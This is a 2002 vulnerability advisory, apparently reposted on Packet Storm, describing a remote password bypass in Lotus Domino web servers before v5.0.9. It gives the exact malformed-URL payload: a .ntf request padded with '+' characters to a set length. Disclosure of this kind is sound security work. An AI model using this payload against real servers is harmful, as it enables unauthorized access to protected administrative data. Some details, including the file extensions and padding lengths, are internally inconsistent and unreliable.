Lotus Domino web server prior to v5.0.9 allows password protected features to be accessed without the password by sending a malformed URL.
341aaccaace7b4578c0a8e33e943b60798194133ad005fdf50c6a57861cef67d---------------------------------------------------------------------------
Web: https://qb0x.net Author: Gabriel A. Maggiotti
Date: Febrary 03, 2002 E-mail: gmaggiot@ciudad.com.ar
---------------------------------------------------------------------------
General Info
------------
Problem Type : password protected url bypass
Product : Lotus Domino
Scope : Remote
Risk : High
Summary
-------
A security vulnerability has been found in the popular Lotus Domino Web server.
Lotus Domino have files like webadmin.nsf, log.nsf and names.nfs, this files
are protected by password. I discover that is posible to bypass this password
if you create a malformed url.
Notes Databases '.nsf' like webadmin.nsf or log.nsf are store in "lotus/domino/
data/" directory nas Notes Templatesi '.ntf' are store in the same place (Here
is the goal).
Examples:
I found a critical and max length.
assuming the buffer is: https://host.com/<buffer>/
Critical buffer length: is the minimun buffer length you need to bypass the
passwd file.
normal url: https://host.com/log.nsf <---- Request for a passwd
modify url: https://host.com/log.ntf<buff>.snf/
|-----217 -------|
In the case of log.nsf, <buff> is 217 - 12 = 205 '+' and the url will be:
https://host.com/log.ntf++++++++++++++++++++.nsf/
|-------- 205 -----|
If you write a buffer between 219 and 257(higher buffer), you bypass the passwd.
modify url: https://host.com/log.ntf<buff>.snf/
|---219 to 257 --|
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed